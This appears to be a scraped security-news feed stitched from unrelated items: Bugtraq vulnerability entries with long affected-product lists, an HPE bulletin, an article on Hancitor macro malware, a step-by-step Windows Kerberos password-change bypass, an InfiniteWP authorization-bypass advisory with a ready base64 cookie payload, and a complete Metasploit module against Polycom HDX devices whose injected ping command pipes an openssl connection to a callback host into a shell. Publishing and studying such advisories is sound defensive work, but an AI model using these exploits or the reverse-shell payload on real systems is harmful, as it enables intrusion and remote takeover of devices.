Bypass

Bugtraq ID: 93191
Class: Design Error
CVE: CVE-2016-7099
Remote: Yes
Local: No
Published: Sep 28 2016 12:00AM
Updated: Nov 19 2016 01:03AM
Credit: Alexander Minozhenko and James Bunton (Atlassian).
Vulnerable:
Nodejs Node.Js 6.0
Nodejs Node.Js 4.0
Nodejs Node.Js 0.12
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
Not Vulnerable:
Nodejs Node.Js 6.7
Nodejs Node.Js 4.6
Nodejs Node.Js 0.12.16
IBM SDK for Node.js 6.7.0.0
IBM SDK for Node.js 4.6.0.0
IBM SDK for Node.js 1.2.0.15
IBM SDK for Node.js 1.1.1.4


SecurityFocus Vulnerabilities


# Exploit Title: Kerberos Security Feature Bypass Vulnerability (Kerberos to NTLM Fallback)
# Date: 22-09-2016
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 Professional (x32/x64) and Windows 10 x64
# CVE : CVE-2016-3237
# Category: Local Exploits & Privilege Escalation

SPECIAL CONFIG: Standard Domain Member configuration with password caching enabled (default), BitLocker enabled without PIN or USB key.
REPRODUCE:
Prerequisites:
- Standard Windows 7/10 Fully patched (up until 08/08/2016) and member of an existing domain.
- BitLocker enabled without PIN or USB key.
- Password Caching enabled
- Victim has cached credentials stored on the system from previous logon.

This vulnerability has a similar attack path as MS15-122 and MS16-014 but bypasses the published remediation.

STEP 1: Obtain physical access to a desktop or laptop with the above configuration.
STEP 2: Boot the system and determine the FQDN of the device (e.g. CLIENT.domain.local). This can be obtained by monitoring the network broadcast communication that the system sends prior to logging in. The username can be extracted from the login screen (e.g. USER1).
STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local).
STEP 4: Create User with similar name as the previously logged in user. (E.g domain\USER1), and force user to change password upon next login.
STEP 5: Login on the target machine and proceed to the change login screen.
STEP 6: Disable the following (Inbound) Firewall Rules:
- Kerberos Key Distribution Center - PCR (TCP and UDP)
- Kerberos Key Distribution Center (TCP and UDP)
STEP 7: Change the password. (Changing Password screen will appear to hang)
STEP 8: Wait 1 minute before re-enabling the firewall rules defined in STEP 6
STEP 9: Enable firewall rules again and after a few seconds the password should be successfully changed.
STEP 10: Message "Your Password has been changed" is displayed, followed by the following error message "The trust relationship between this workstation and the primary domain failed."
STEP 11: Disconnect Target system's network connection.
STEP 12: Login with the new changed password.

IMPACT: Access is gained to the information stored on the target system without previous knowledge of the password or any other information. This could also be used to elevate your privileges to local Administrator.

Reference: Video PoC/Demo can be found here: https://www.youtube.com/watch?v=4vbmBrKRZGA
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)


Exploit Files ≈ Packet Storm


Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05257711

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05257711
Version: 1

HPSBST03640 rev.1 - HP XP7 Command View Advance Edition Suite (CVAE) using
Replication Manager (RepMgr) and Device Manager (DevMgr), Local Access
Restriction Bypass

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-09-01
Last Updated: 2016-09-01

Potential Security Impact: Local Access Restriction Bypass

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP XP7 Command View
Advance Edition Suite (CVAE) using Replication Manager (RepMgr) and Device
Manager (DevMgr). This vulnerability could be locally exploited to allow
access restriction bypass.

References:

- CVE-2016-4381
- PSRT110214

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP XP7 Command View Advanced Edition Suite RepMgr and DevMgr version 6.2.0-00
to versions prior to 8.4.1-02

BACKGROUND

CVSS Base Metrics
=================
Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4381
5.3 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has released the following software updates to resolve the vulnerability
in HP XP7 Command View Advance Edition Suite.

- Device Manager (DevMgr) version 8.4.1-02
- Replication Manager (RepMgr) version 8.4.1-02

The updates are available from the following locations.

- Full installer updates:

https://h20575.www2.hp.com/usbportal/softwareupdate.do

- Patches:

https://h20575.www2.hpe.com/tsusbportal/index.do?lc=EN_US&src=HPSC

**Note:** A valid HPE Passport account is needed to download the patches.
Please contact HPE Technical Support for assistance.

HISTORY
Version:1 (rev.1) - 1 September 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert (at) hpe (dot) com.

Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert (at) hpe (dot) com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.



SecurityFocus Vulnerabilities

Macro-based malware is growing into full-featured malware capable of detecting and bypassing traditional security tools, Barkly researchers have discovered.

Macro-based malware: The past

Malware peddlers have been misusing Word macros to deliver malware for nearly fifteen years.

The approach, which takes advantage of the macros’ capability to automatically execute a series of instructions as a single command, was first used in the early 2000s.

As users became accustomed to it, this malware delivery tactic was abandoned, only to resurface again in late 2014, allowing criminals to prey on newer generations of computer users.

In the last two years, they have cycled through many different approaches for tricking users into enabling Word macros, but the malicious Word documents usually contained just scripts that would be triggered to download a dropper, which would then download the final malicious payload from a C&C server.

Macro-based malware: The future?

Barkly researchers have recently spotted a new wave of phishing emails that deliver booby-trapped Word documents posing as invoices, and asking users to enable macros in order to view the content:

But this run was unlike many others before it, because the criminals have decided to leverage a second-stage executable payload embedded directly into the Word document.

“One thing that makes this latest version of [well-known downloader] Hancitor stand out is that its payload is already bundled as a binary object directly in the Word doc. It’s this payload that pings the C2 server. What it receives are pointers back to two additional binary objects (one executable and one DLL), which it downloads and executes,” the researchers explained. The executed dynamic-link library (DLL) calls are what give the attackers access to operating system resources and let them grab additional payloads.

The change in approach is an attempt to throw traditional security tools off the malware’s scent.

In this particular spam campaign, Hancitor attempts to drop the Pony and Vawtrak information-stealing Trojans, but it could just as easily be any other type of malware.

Protecting users against macro-based malware

In enterprise setups, employees can be protected through a combination of AV and behavioral-based protection, email filtering, and event monitoring, the researchers advised. Educating users on how to spot malicious emails and phishing attempts, and making sure that they can report incidents easily and without fear of negative repercussions, is also a must.

In Office 2016, Microsoft has added a new feature that allows enterprise administrators to block all macros from running in Office documents that come from the Internet.

Non-enterprise users must still rely on their own capabilities to spot these attempts, but endpoint security solutions and spam filters used by popular email providers can be of great help.


Help Net Security

------------------------------------------------------------------------
Authorization bypass in InfiniteWP Admin Panel
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
An authorization bypass was found in the InfiniteWP Admin Panel that
allows an unauthenticated attacker to gain access to the InfiniteWP
Admin Panel.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0007

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on IWPAdminPanel version 2.8.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in IWPAdminPanel version 2.9.0.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/authorization_bypass_in_infinitewp_admin_panel.html

Most files in the Admin Panel (ajax.php, debug.php, et cetera) include app.php from the includes directory. This file calls the method checkUserLoggedInAndRedirect to check whether a user is logged in.

The method checkUserLoggedInAndRedirect calls checkUserLoggedIn, where the user's cookie is unserialized. The expected value from the unserialization is a string, which is split on "||". The first value is treated as an email address and the second value as an md5 hash. The email address is used to retrieve user data from the database. The database query returns an email address and a password.

The email address and password from the result are concatenated and hashed with md5. This hash is compared to the hash from the cookie. If they match, the method returns true, meaning the user is logged in.

By submitting a cookie with a non-existent email address, the query returns an empty result. The generated md5 hash will then be the md5 hash of an empty string:

md5(email + password) = md5("" + "") = md5("") = "d41d8cd98f00b204e9800998ecf8427e"

Vulnerable code:

list($userEmail, $userSlat) = explode('||', $userCookie);
$userEmail = filterParameters($userEmail);
if ($userEmail != '' && $userSlat != '') {
    $where = array(
        'query'  => "email = ':email'",
        'params' => array(
            ':email' => trim($userEmail)
        )
    );
    // An unknown email address yields an empty result here; it is never checked.
    $userInfo = DB::getRow("?:users", "userID,email,password", $where);

    $GLOBALS['userID'] = $userInfo['userID'];
    $GLOBALS['email'] = strtolower($userInfo['email']);
    // With an empty result this evaluates to md5('' . '') = md5('').
    $dbSlat = md5($GLOBALS['email'] . $userInfo['password']);
    if ($userSlat == $dbSlat) {
        $return = true;
        // (the excerpt in the advisory ends here)
    }
}

Proof of concept

The following value can be base64 encoded in the user cookie to bypass the authorization check:

s:44:"falseEmail||d41d8cd98f00b204e9800998ecf8427e";

This includes a non-existing email address (falseEmail) and the md5 hash of an empty string (d41d8cd98f00b204e9800998ecf8427e).

Exploitation can be shown as follows. First, call the ajax.php page without a cookie to ensure that you are not logged in:
http://<webserver>/IWPAdminPanel_v2.8.0/ajax.php

This should return:

'"logout":true'...

Now set a cookie named iwp_userCookie to czo0NDoiZmFsc2VFbWFpbHx8ZDQxZDhjZDk4ZjAwYjIwNGU5ODAwOTk4ZWNmODQyN2UiOw== and visit the URL again. It will now return:

{"actionResult":[],"data":[]...
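
The check described above, next to a variant that rejects an empty lookup result, as an added example (not InfiniteWP source and not the change shipped in 2.9.0). The function names, the in-memory user table and the sample account are assumptions made for illustration; the token scheme is kept as the advisory describes it.

```php
<?php
// Added illustration, not InfiniteWP source. lookupUser(), decodeCookie(),
// makeCookie(), checkVulnerable() and checkHardened() are hypothetical names,
// and the user table below is constructed sample data.

const USERS = [
    'admin@example.test' => [
        'userID'   => 1,
        'email'    => 'admin@example.test',
        'password' => '5f4dcc3b5aa765d61d8327deb882cf99', // constructed stored hash
    ],
];

// Stand-in for the users query: the matching row, or null when none exists.
function lookupUser(string $email): ?array
{
    return USERS[strtolower(trim($email))] ?? null;
}

// Cookie format from the advisory: base64 of a serialized "email||md5" string.
function decodeCookie(string $raw): string
{
    $decoded = base64_decode($raw, true);
    if ($decoded === false) {
        return '';
    }
    // allowed_classes => false keeps unserialize() from instantiating objects.
    $value = @unserialize($decoded, ['allowed_classes' => false]);
    return is_string($value) ? $value : '';
}

function makeCookie(string $email, string $token): string
{
    return base64_encode(serialize($email . '||' . $token));
}

// Same logic as the vulnerable excerpt: the lookup result is never checked,
// so a missing row turns the expected token into md5('' . '').
function checkVulnerable(string $raw): bool
{
    $parts = explode('||', decodeCookie($raw));
    $userEmail = $parts[0];
    $userSlat = $parts[1] ?? '';
    if ($userEmail === '' || $userSlat === '') {
        return false;
    }
    $userInfo = lookupUser($userEmail); // null for an unknown address
    $email = strtolower($userInfo['email'] ?? '');
    $dbSlat = md5($email . ($userInfo['password'] ?? ''));
    return $userSlat == $dbSlat;
}

// Hardened variant: fail closed when no user row (or an incomplete one) comes
// back, and compare in constant time. The token is still derived only from
// database fields; a server-side session or an HMAC keyed with a server secret
// would be a stronger design.
function checkHardened(string $raw): bool
{
    $parts = explode('||', decodeCookie($raw), 2);
    if (count($parts) !== 2 || $parts[0] === '' || $parts[1] === '') {
        return false;
    }
    $userInfo = lookupUser($parts[0]);
    if ($userInfo === null || $userInfo['email'] === '' || $userInfo['password'] === '') {
        return false;
    }
    $expected = md5(strtolower($userInfo['email']) . $userInfo['password']);
    return hash_equals($expected, $parts[1]);
}

// Constructed test cookies: a legitimate one, the advisory's unknown-address
// case, and a known address paired with the empty-string hash.
$email = 'admin@example.test';
$cookies = [
    'valid user'        => makeCookie($email, md5($email . USERS[$email]['password'])),
    'unknown + md5("")' => makeCookie('falseEmail', md5('')),
    'known + md5("")'   => makeCookie($email, md5('')),
];

foreach ($cookies as $label => $cookie) {
    printf(
        "%-20s vulnerable=%s hardened=%s\n",
        $label,
        var_export(checkVulnerable($cookie), true),
        var_export(checkHardened($cookie), true)
    );
}
```

Only the unknown-address cookie is treated differently by the two functions, which isolates the missing empty-result check as the cause.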

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.


Exploit Files ≈ Packet Storm


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Polycom Command Shell Authorization Bypass',
'Alias' => 'psh_auth_bypass',
'Author' =>
[
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
'h00die <[email protected]>', # submission/cleanup
],
'DisclosureDate' => 'Jan 18 2013',
'Description' => %q(
The login component of the Polycom Command Shell on Polycom HDX
video endpoints, running software versions 3.0.5 and earlier,
is vulnerable to an authorization bypass when simultaneous
connections are made to the service, allowing remote network
attackers to gain access to a sandboxed telnet prompt without
authentication. Versions prior to 3.0.4 contain OS command
injection in the ping command which can be used to execute
arbitrary commands as root.
),
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
[ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
[ 'EDB', '24494']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Space' => 8000,
'DisableNops' => true,
'Compat' => { 'PayloadType' => 'cmd' }
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
'DefaultTarget' => 0
)
)

register_options(
[
Opt::RHOST(),
Opt::RPORT(23),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
], self.class
)
register_advanced_options(
[
OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
], self.class
)
end

def check
connect
sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
Rex.sleep(1)
res = sock.get_once
disconnect

if res.nil? || res.empty?
return Exploit::CheckCode::Safe
end

if res =~ /Welcome to ViewStation/
return Exploit::CheckCode::Appears
end

Exploit::CheckCode::Safe
end

def exploit
# Keep track of results (successful connections)
results = []

# Random string for password
password = Rex::Text.rand_text_alpha(rand(5) + 1)

# Threaded login checker
max_threads = datastore['THREADS']
cur_threads = []

# Try up to 100 times just to be sure
queue = [*(1..datastore['MAX_CONNECTIONS'])]

print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
until queue.empty?
while cur_threads.length < max_threads

# We can stop if we get a valid login
break unless results.empty?

# keep track of how many attempts we've made
item = queue.shift

# We can stop if we reach max tries
break unless item

t = Thread.new(item) do |count|
sock = connect
sock.put(password + "\n")
res = sock.get_once

until res.empty?
break unless results.empty?

# Post-login Polycom banner means success
if res =~ /Polycom/
results << sock
break
# bind error indicates bypass is working
elsif res =~ /bind/
sock.put(password + "\n")
# Login error means we need to disconnect
elsif res =~ /failed/
break
# Too many connections means we need to disconnect
elsif res =~ /Error/
break
end
res = sock.get_once
end
end

cur_threads << t
end

# We can stop if we get a valid login
break unless results.empty?

# Add to a list of dead threads if we're finished
cur_threads.each_index do |ti|
t = cur_threads[ti]
unless t.alive?
cur_threads[ti] = nil
end
end

# Remove any dead threads from the set
cur_threads.delete(nil)

Rex.sleep(0.25)
end

# Clean up any remaining threads
cur_threads.each { |t| t.kill }

if !results.empty?
print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
do_payload(results[0])
else
print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
end
end

def do_payload(sock)
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

# Start a listener
start_listener(true)

# Figure out the port we picked
cbport = self.service.getsockname[2]

# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
sock.put(cmd)

# Give time for our command to be queued and executed
1.upto(5) do
Rex.sleep(1)
break if session_created?
end
end

def stage_final_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end

def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == 'local'
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end

self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
}
)

self.service.on_client_connect_proc = proc { |cli| stage_final_payload(cli) }

# Start the listening service
self.service.start
end

# Shut down any running services
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.is_a?(Rex::Service)
if self.service.is_a?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end

# Accessor for our TCP payload stager
attr_accessor :service
end


Exploit Files ≈ Packet Storm

Bugtraq ID: 82237
Class: Design Error
CVE: CVE-2015-3197
Remote: Yes
Local: No
Published: Jan 28 2016 12:00AM
Updated: Aug 02 2016 06:00AM
Credit: Nimrod Aviram and Sebastian Schinzel
Vulnerable:
SuSE SUSE Linux Enterprise Server 10 SP4 LTSS
SuSE openSUSE Evergreen 11.4
Slackware Slackware Linux 14.1
Slackware Linux x86_64 -current
Slackware Linux 14.1 x86_64
Slackware Linux 14.0 x86_64
Slackware Linux 14.0
Slackware Linux -current
S.u.S.E. openSUSE 13.1
Redhat Enterprise Virtualization 3
Redhat Enterprise Linux Server AUS 6.5
Redhat Enterprise Linux Server AUS 6.4
Redhat Enterprise Linux Server AUS 6.2
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0
Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle VM Server for x86 3.2
Oracle Tuxedo 12.1.1.0
Oracle Switch ES1-24 1.3
Oracle Sun Network 10GE Switch 72p 1.2
Oracle Sun Blade 6000 Ethernet Switched NEM 24P 10GE 1.2
Oracle Solaris 10
Oracle Primavera P6 Enterprise Project Portfolio Management 8.4
Oracle Primavera P6 Enterprise Project Portfolio Management 8.3
Oracle Primavera P6 Enterprise Project Portfolio Management 16.1
Oracle Primavera P6 Enterprise Project Portfolio Management 15.2
Oracle Primavera P6 Enterprise Project Portfolio Management 15.1
Oracle PeopleSoft Enterprise PeopleTools 8.55
Oracle PeopleSoft Enterprise PeopleTools 8.54
Oracle PeopleSoft Enterprise PeopleTools 8.53
Oracle OSS Support Tools Oracle Explorer 10
Oracle JD Edwards EnterpriseOne Tools 9.2.0.5
Oracle Exalogic Infrastructure 2.0
Oracle Exalogic Infrastructure 1.0
Oracle Ethernet Switch 40G 10G 72 2.0
Oracle Ethernet Switch 40G 10G 64 2.0
Oracle Enterprise Manager Ops Center 12.3.2
Oracle Enterprise Manager Ops Center 12.2.2
Oracle Enterprise Manager Ops Center 12.1.4
Oracle Enterprise Linux 6.2
Oracle Enterprise Linux 6
Oracle Enterprise Linux 5
Oracle Communications Network Charging and Control 5.0.2.0.0
Oracle Communications Network Charging and Control 5.0.1.0.0
Oracle Communications Network Charging and Control 5.0.0.2.0
Oracle Communications Network Charging and Control 5.0.0.1.0
Oracle Communications Network Charging and Control 4.4.1.5.0
OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
IBM Watson Explorer Foundational Components 9.0.0.6
IBM Watson Explorer Foundational Components 9.0.0.0
IBM Watson Explorer Foundational Components 10.0.0.2
IBM Watson Explorer Foundational Components 10.0.0.0
IBM Vios 2.2.3
IBM Vios 2.2
IBM Tivoli Provisioning Manager for OS Deployment 5.1 .3
IBM Tivoli Provisioning Manager for OS Deployment 5.1
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.19
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1
IBM Tivoli Provisioning Manager for OS Deployment 5.1.0.2
IBM Tivoli Provisioning Manager for Images System x Edition 7.1.1.0
IBM Tivoli Provisioning Manager for Images 7.1.1.19
IBM Tivoli Provisioning Manager for Images 7.1.1.0
IBM Tivoli Netcool Reporter 2.2
IBM SmartCloud Entry 3.2 Appliance fix pack 1
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1 Appliance fix pack 1
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 3.2 Appliance fixpac
IBM SmartCloud Entry 3.1 Appliance fixpac
IBM Security Network Protection 5.3.2
IBM Security Network Protection 5.3.1
IBM Security Identity Manager Virtual Appliance 7.0.1.0
IBM Security Identity Manager Virtual Appliance 7.0.0.3
IBM Security Identity Manager Virtual Appliance 7.0.0.2
IBM Security Identity Manager Virtual Appliance 7.0.0.1
IBM Security Identity Manager Virtual Appliance 7.0.0.0
IBM Security Identity Governance and Intelligence 5.2.1
IBM Security Guardium 10.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM Real-time Compression Appliance 4.1.2
IBM Rational Developer for i 9.1.1
IBM Rational Developer for i 9.5.0.2
IBM Rational Developer for i 9.5.0.1
IBM Rational Developer for i 9.5
IBM Rational Developer for i 9.1.1.1
IBM Rational Developer for i 9.1
IBM Rational Developer for AIX and Linux 9.1.1
IBM Rational Developer for AIX and Linux 9.1.1.2
IBM Rational Developer for AIX and Linux 9.1.1.1
IBM Rational Developer for AIX and Linux 9.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
IBM PureApplication System 2.2.0.0
IBM PureApplication System 2.1
IBM PureApplication System 2.0
IBM Proventia Network Enterprise Scanner 2.3
IBM PowerKVM 2.1.1 Build 65.6
IBM PowerKVM 2.1.1 Build 65.5
IBM PowerKVM 2.1.1 Build 65.4
IBM PowerKVM 2.1.1 build 57
IBM PowerKVM 3.1 Build 3
IBM PowerKVM 3.1 Build 2
IBM PowerKVM 3.1
IBM PowerKVM 2.1.1 Build 65.1
IBM PowerKVM 2.1.1 build 58
IBM PowerKVM 2.1
IBM Power HMC 8.4.0.0
IBM Power HMC 8.3.0.0
IBM Power HMC 8.2.0.0
IBM Power HMC 8.1.0.0
IBM Power HMC 7.9.0.0
IBM Power HMC 7.3.0.0
IBM MQ Light Client Module for Node.js 1.0.2014091001
IBM MQ Light Client Module for Node.js 1.0.2014090801
IBM MQ Light Client Module for Node.js 1.0.2014090800
IBM MQ Light Client Module for Node.js 1.0.2014091000-red
IBM Initiate Master Data Service Provider Hub 9.7
IBM Initiate Master Data Service Provider Hub 9.5
IBM Initiate Master Data Service 9.7
IBM Initiate Master Data Service 9.5
IBM Initiate Master Data Service 10.1
IBM Initiate Master Data Service 10.0
IBM InfoSphere Master Data Management Standard/Advanced Edition 11.5
IBM InfoSphere Master Data Management Standard/Advanced Edition 11.4
IBM InfoSphere Master Data Management Standard/Advanced Edition 11.3
IBM InfoSphere Master Data Management Standard/Advanced Edition 11.0
IBM InfoSphere Master Data Management Provider Hub 10.0
IBM InfoSphere Data Explorer 8.2-4
IBM InfoSphere Data Explorer 8.2
IBM Image Construction and Composition Tool 2.3.2.0
IBM Image Construction and Composition Tool 2.3.1.0
IBM i 7.2
IBM i 7.1
IBM Flex System Manager 1.3.2 0
IBM Flex System Manager 1.2.1
IBM Flex System Manager 1.2
IBM Flex System Manager 1.1
IBM Flex System Manager 1.3.4.0
IBM Flex System Manager 1.3.3.0
IBM Flex System Manager 1.3.1
IBM Flex System Manager 1.3.0.1
IBM Flex System Manager 1.3.0
IBM Flex System Chassis Management Module 2PET
IBM DataPower Gateways 7.0
IBM DataPower Gateways 7.5.0.1
IBM DataPower Gateways 7.5.0.0
IBM DataPower Gateways 7.2.0.5
IBM DataPower Gateways 7.2.0.4
IBM DataPower Gateways 7.2.0.3
IBM DataPower Gateways 7.2.0.2
IBM DataPower Gateways 7.2.0.1
IBM DataPower Gateways 7.2.0.0
IBM DataPower Gateways 7.1.0.9
IBM DataPower Gateways 7.1.0.8
IBM DataPower Gateways 7.1.0.7
IBM DataPower Gateways 7.1.0.6
IBM DataPower Gateways 7.1.0.5
IBM DataPower Gateways 7.1
IBM DataPower Gateways 7.0.0.9
IBM DataPower Gateways 7.0.0.8
IBM DataPower Gateways 7.0.0.12
IBM DataPower Gateways 7.0.0.11
IBM DataPower Gateways 7.0.0.10
IBM Cognos Insight 10.2.2
IBM Cognos Insight 10.2.1
